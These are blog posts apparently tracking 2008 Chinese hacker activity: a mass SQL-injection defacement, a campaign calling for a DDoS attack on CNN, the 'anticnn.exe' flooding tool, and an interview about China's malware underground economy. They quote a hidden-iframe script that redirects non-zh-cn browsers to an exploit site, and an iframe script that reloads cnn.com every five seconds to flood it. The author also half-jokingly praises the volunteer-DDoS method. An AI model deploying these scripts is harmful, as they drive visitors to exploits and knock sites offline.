The Dark Visitor

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese – zh-cn.  Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits.  Cool.  here is the code snippet from the ISC:

if (navigator.systemLanguage==’zh-cn‘){}else{document.writeln(“<iframe
src=http://www.ririwow.cn/index.htm” width=100 height=0></iframe>”);}

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!

Danwei linked to this article indicating that the hackers responsible for compromising the Korean auction site several months ago have been arrested in the PRC.  The article goes on to describe some interesting details such as:

KBS also talked to Chinese hackers who claim there is something of a black market for Korean personal information in China. They say Koreans hire Chinese hackers to break into sites to get information, which is then handed over and sold in Korea.

There is also some limited information about a tool that was used to compromise the Korean sites.

UPDATE FIZZLE: Just got word from Jose that nothing happened with the CNN website today. Chinese hackers are starting to make me look bad and I will not stand for that!!

If this keeps up, it may be easier to list the days that Chinese hackers are not calling for an attack on CNN.

Had some serious reservations about posting this article for a couple of reasons but decided it is probably worthwhile. The cons are that there is ZERO confirmation from other sites about the impending attack and the alert posting did not list a sponsoring organization. On the pro side, it included a website that was setup on the 20th (after initial attack) that is linked in the post and looks like it is there to support the action.

So, large CAVEAT: UNCONFIRMED

Added bonus, stupid clock again:

The Announcement

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issuses regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us.

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people.

If it is convenient, please circulate this message to all of your groups. We need support…. Currently, many of us are going to this webpage to carry out the attack, http://www.goupsoft.com.cn/Bs_Cnn.html. The first time you open it, it might not display. Just refresh the page and it should be okay.

Kinda Lazy (but genius!)

Over at the attack website of goupsoft.com, you land on an automated webpage that uses your computer and IP address to continuously “attack” the CNN website unless you close the browser. My guess is that it is constantly making fresh requests from CNN to tie up bandwidth. The graphic below even shows the number of attacks you have made on the site.

Yeah, I kinda attacked CNN 24 times…Whoops! Well, CNN never returned my e-mail either! Damn, I’m sort of a Chinese hacker now? Anyway, the only really interesting thing in that blurb of Chinese above is that they call CNN a “whore.” Really, twice.

This Attack Method Spreading

While this might be the oldest trick in the book, it is new to me so I’m putting it out there. The website http://www.chenmin.org/doscnn.html is using pretty much the exact same attack method as mentioned previously.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

<script>

var e=document.getElementById(‘cnn’);

setInterval(“e.src=’http://www.cnn.com‘”,5000);

//1000 表示1000毫秒,你可以修改并转发

</script> Probably not as effective as the Mao-inator program.

I direct your attention to the last line (emphasis mine) in Jumper’s e-mail. Number one, he dubs the program he analyzed yesterday as the Mao-inator™, which I personally find hilarious. Number two, there seems to be a slight amount of professional jealousy involved since he is dismissing my program as “less effective” than the one he worked with. Yeah, but did yours call CNN a “whore” didn’t think so! Less effective, I think not sir!

All kidding aside, this is an excellent method for incorporating large numbers of unskilled people into your DDoS attack. It comes with the added advantage of using their computers, IP addresses and bandwidth and you don’t have to train them. The only skill that is required is the ability to open a webpage in a browser and let it run. Plus, recruits who might not be so willing to stick around to the end of the fight, if tied to a computer all day, are free to do whatever they want while at the same time defending the motherland. My vote GENIUS!

Make up your own odds if this will actually take place. I have informed Jose Nazario at Arbor Networks who has been monitoring this situation closely and has had great insights.

UPDATE 1: Located the blog for Li Haiwei, the owner of the attack website goupsoft.com.cn, and my boy has some serious issues with CNN and Tibet. Lots of disturbing imagery for the whole family:

The graphic reads, “CNN- I like it. I am CNN.” Then some stuff way too small to read. The Nobel Peace Prize award you can read yourself and at the bottom Tibet.

UPDATE 2: Netcraft has a live performance monitor for the CNN webiste here.

CNN hating Chinese nationalists can download a tool to send high volumes of requests to www.cnn.com in an attempt to knock it offline.  The tool is bundled in a .rar file that contains a readme and the pre-compiled windows binary.  A quick virus check showed that some scanners identified it as backdoor but that didn’t seem to be the case.  When I ran the tool, a simple flag icon appeared in the lower right of my test VM.

 When I click on the flag, the full interface appears with three options:  start/stop, minimize and exit. 

Here is a sample of the request/response I got after running it for a few seconds:

GET /aux/con/com1/../../[LAG]../.%%%%%%%%./../../../../fakecnn/redflag-stay-here.php.aspx.asp.cfm.jsp HTTP/1.1

Accept: */*

Host: www.cnn.com

Connection: Keep-Alive

 
HTTP/1.1 400 Bad Request

Date: Tue, 22 Apr 2008 12:12:34 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 287

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache Server at www.cnn.com Port 80</address>
</body></html>

I read somewhere that it is self-updating but I never saw any requests other than DNS resolution (to my own configured DNS servers, not hard-coded) and requests to www.cnn.com.  I’ll run it in “paused” mode for a while to see what happens.

UPDATE (0100GMT 23 April 08):  No suspicious traffic came from this binary (apart from what was expected, of course).

UPDATE (1628GMT 24 April 08): Heike and I have dubbed anticnn.exe the “Mao-inator”.

This seems to be one of the most popular articles currently floating around on Chinese hacker websites concerning the increasing resilience of new viruses and the virus industrial chain.  This will be extreme gist because I’m kinda pressed for time today:

1.  Little Wu, expert gamer, depressed because all his virtual property is getting stolen
2.  Little Wu isn’t alone, past couple of days all the online gamers have been worried about a new virus called the  Disk Wizard
3.  Disk Wizard is considered 10 times more serious than last year’s king of viruses Panda Burning Incense
4.  According to reports, Disk Wizard can prohibit the use of any anti-virus software
5.  Disk Wizard can prevent the user from going into safe mode to remove the virus and from accessing their anti-virus webpage to request help
6. CNCERT estimates the virus industrial chain earning 238 million YUAN a year and causing losses of 7.6 billion YUAN
7. Reported that the author of Mechanical Dog made 100,000 YUAN a month, more than four times the amount of top programmers
8. Engineer from Kingsoft said that Trojans such as Mechanical Dog and others were working together to deliver the viruses
9. Disk Wizard is cable of downloading AV Terminator (Mechanical Dog)
10. These types of Trojan download tools have become the most popular platforms for virus manufactures and also their most profitable
11. Due to lack of oversight, it is becoming more common to see viruses for sale on the Internet
12. Very easy to find malware for sale postings all over the place, use 
    QQ number to contact seller
13. Estimates that by 2010 China’s online gaming industry will earn 30 billion YUAN
14. CNNIC reports China already has 40 million online gamers, making up 20% on their online population
15. Report claims that laws need to be clarified to go after virus manufactures, now it is only a misdemeanor

I really want to find a larger version of that chart at the top of the page, spent about 2 hours trying to locate it with no luck. If anyone finds it, please let me know.

An interesting article in the Washington Post this morning about China-based hackers targeting a group of Darfur supporters called “Save Darfur Coalition”.  The article indicates that the Save Darfur Coalition is critical of the PRC role in Darfur. 

 The allegation fits a near decade-old pattern of cyber-espionage and cyber-intimidation by the Chinese government against critics of its human rights practices, experts said. It comes as calls for a boycott of the 2008 Beijing Olympics have been mounting since China’s crackdown on Tibetan protesters last week. “

This reminds me of the targeted attacks on members of Fa1un G0ng reported by Maarten Van Horenbeeck.  Also see Maarten’s CCC presentation here.  Heike reported on Maarten’s presentation earlier.

Horton hears a (Chinese hacker) Hu…Part I
Horton hears a (Chinese hacker) Hu…Part II
Horton hears a (Chinese hacker) Hu…Part III

The highest earnings come from selling loopholes.  This isn’t something the normal programmer can do, it takes a high-level of skill to locate a loopholes on a large company’s website.  According to hacker Hu, these loopholes can be used to carry out attacks on corporations and therefore, sell for several tens of thousands of YUAN, to several hundred thousand YUAN.

Not only that, hackers can receive requests to design viruses and the anti-viruses. Hackers can also put together groups of controlled computers to launch large-scale attacks. These groups of computers are called botnets in hacker groups.

Monitored data from CNCERT shows that China has five botnets that exceed over 100,000 slave computers and one or two of those have 300,000 slave computers. These slave networks can be leased and earn the hackers millions of YUAN a year. According to CNCERT, this section of the underground industry is exceeding 238 million YUAN a year and causing losses of over 7.6 billion YUAN.

Hacker Hu said that after the virus maker sells the virus, the virus’ journey
has just begun.  For example, after a “Gun Buyer” purchases a virus to steal virtual property, they will hire a botnet to spread the virus. The disseminated virus can steal online game players money and weapons and send the stolen goods to a mailbox.

The botnet is the core for disseminating viruses but there is a fairly easy method to accomplish this. Hacker Hu smiles, “You get up early, go to the internet bar and capture the 30 computers there with a virus and go home and wait for the money.” The programmer or the person owning the botnet, can earn five FEN to five JIAO for every infected computer. The hacker industry has evolved to the point where there are very distinct divisions of labor. Each gang usually has ten or more people, some who spread the virus, some who steal virtual currency and some who launder the money.

NOTE: Five FEN is worth about .6 cents and five JIAO about 6 cents.

To launder virtual items, a member of the gang will open a lot of gamer accounts and a stolen article will be passed around among these different accounts and then sold. The game company doesn’t know which accounts are real players and which are sellers. Hacker Hu says that the virtual money is then sold at wholesale through a down-line surrogate.

In addition, hackers design other Trojans for sale that are mass produced and burned onto. Based on the exclusive nature or functionality of the Trojan, the price can be from tens of YUAN to over 1,000 YUAN.  Furthermore, some hacker organizations provide malicious advertising plug-in services.  These plug-ins causes a users computer to pop up a special window, every 1,000 times the window pop ups earns 12 YUAN. Currently, there are at least 50 malicious advertising agencies within the country (China).  CNCERT estimates that the annual production of malicious advertising amounts to 108 million YUAN.

Thus ends the saga of Chinese hacker HU!

Horton hears a (Chinese hacker) Hu…Part I
Horton hears a (Chinese hacker) Hu…Part II

Normally, computers with known security loopholes are the targets for “Hanging the Horse.” Once these computers have been infected with a Trojan, it is very possible that someone browsing could unwittingly click on the Trojan and valuable information contained on the computer could fall into the clients hands.  Another method of “Hanging the Horse” is through junk mail or posting documents that contain Trojans on forums that encourage users to download them.  Once the attack is successful, the targeted information can be stolen using hacker tools.

In hacker circles, these packets of information are called “Envelopes” and are divided up differently depending on the type of product; there are “Equipment Envelopes,” “QQ Envelopes,”…etc. The next sentence is a little tricky but it seems to equate the sell of the “Envelopes” at this stage a wholesale market.

NOTE: From a segment that appears later in this story, I believe that an “Equipment Envelope” is referring to one that contains online game virtual property like swords, helmets, armor…etc.

From there the hackers can gather the most valuable information, like QQ numbers that are relatively short or have a higher rank. Afterwards, these filtered “Second-hand Envelopes” move into the retail market.  After the “Traders” sort the evelopes, they will use BBS and e-commerce sites to make the final sale of the stolen virtual property (Q-money, online game equipment…etc.).

The “Gun Sellers,” “Horse Hangers,” “Major Clients,” and “Traders” all make money. The economic benefits are rapidly turning the word “hacker,” which was once synonymous with “Technology Knights,” into a dirty word. However, hacker Hu says that the real money makers in this chain are the major clients (namely, the one who steals the envelopes).

If done well, it is not difficult to make several tens of thousands of YUAN a month. Some people earn over 10 million YUAN a year. With the cooperation of as few 2-3 or as many 10 people, after this valuable passes though the underground chain it is sold all around the world.

It was reported that Li Jun, the programmer who wrote “Panda Burning Incense,” deposited nearly 10,000 YUAN a day into his account. After he was arrested by police, he acknowledged that he had made over 10 milliion YUAN.

Sorry, looks like it is going to be a 4-part post. More tomorrow.

Horton hears a (Chinese hacker) Hu…Part IV

continuation of Horton hears a (Chinese hacker) Hu…

The article next asks the question, what is the nature of the Chinese hacker community? A reporter from the paper went inside serveral of the domestic (Chinese) hacker websites and forums to carry out an investigation in order to answer this question. In a network that specialized in selling online gamer information, the reporter was able to contact a hacker through his QQ number. The hacker was only willing to reveal his surname Hu.

According to hacker Hu, he was 23 years old, had just graduated from a computer vocational school and was working as a programmer for a software firm in Shenzhen. Hacker Hu’s QQ name was “Envelope Seller.” Hu explained that he provided all categories of hacker services; installing Trojans, taking control of websites and intrusion.

Hacker Hu said that currently, all the professional hacker were just like him and that most of them did not have a formal profession. They depended on their hacker business to make a living.

The article then recounts the 2007 case of Panda Burning Incense.  This was the virus unleashed by Li Jun, a 25-year-old hacker from Wuhan, who caused massive damage to domestic Chinese networks.

Hacker Hu explains that he is careful and meets his clients either through BBS or friends and afterwards they communicate through QQ.  Hu further explains that his services are specific to each customer and that he is not like Li Jun, who sold his virus to just anyone. Hu says he does this to prevent a similar wide-spread viral outbreak.

Hackers like Hu, who have the ability to program viruses, are called “Gun Sellers” and their main role is the manufacture of hacker tools. They then sell these tools to their down-line clients.  The clients pay several hundred or thousands of YUAN to “Gun Sellers” like Hu to purchase these hacker procedures, the most popular being Trojans.

The next step is to plant the Trojan on the website, this step is called “Hanging the Horse.” The Client can complete this part themself, or if they do not have the skills to do it, they can hire a specialist.  Hacker Hu will sometimes do this for his clients.

Sorry, CinC house just said, ”If you don’t get off the computer, I will kill you!”
Gotta go, more tomorrow.

Horton hears a (Chinese hacker) Hu…Part III

Horton hears a (Chinese hacker) Hu…Part IV

Yeah, sorry about the title…

This story comes via the news.china.com and is an inteview with a Chinese hacker named Hu.  The good news is that it is one of the most candid interviews I have ever read. The bad news is that it is very long and has a lot of technical language that I constantly struggle with.  So, it will be at least a three-part post (if not more) and will be heavily edited in some places. I also may call on one or two of you to lend a hand in coming up with the exact technical jargon. Our hacker Hu gives a very detailed look inside the economy of the underground world of Chinese hackers.

The article begins with a story about a Miss Liu, who returns home, turns on her computer and as she is skimming through webpages, a Word document suddenly opens.  At the top of the document, it begins to automatically write, “I have seen your picture, you are certainly very pretty!”

Due to her job at a large website portal, she immediately realizes this as a Trojan sequence and shuts off the power to the computer. (Miss Liu) “I didn’t expect that my computer could be hit by the Gray Pigeon (Trojan) and turned into a meat chicken (肉鸡). If I hadn’t turned off the computer, the hacker would still be controlling my computer and would also be able to send out data packets giving away all my computers secrets.

The term Rouji (肉鸡), Meat Chicken, I believe is slang for a compromised/infected computer. (a little help!)

It is reported that Gray Pigeon is one of the most virulent viruses in the last several years. The 2007 China Computer Virus Epidemic Network Security Report classified it as the 3rd largest virus.  After infection, the computer can be completely controlled through long-distance attack. The hacker can easily copy, delete or download documents on the computer. Through long-distance attack (the hacker) can also record every keystroke, the users QQ number and online game user information. Furthermore, after infection, the computer that the hacker has invaded is called meat chicken.

In fact, in China, there are several million users just like Miss Liu who are unaware that they are contributing to the strength of this network underground industrial chain.  According to statistics from the Kingsoft Global Anti-Virus Monitoring Center, in 2007, the nation (China) had over 50 million infected computers; an 18.15 percent increase over the same time last year with 90.56 percent of internet users suffering a virus attack. Among those, over 5 million of the infected computers were in Guangdong.

End Part I…tomorrow we will actually get into the interview with hacker Hu.

Horton hears a (Chinese hacker) Hu…Part II
Horton hears a (Chinese hacker) Hu…Part III
Horton hears a (Chinese hacker) Hu…Part IV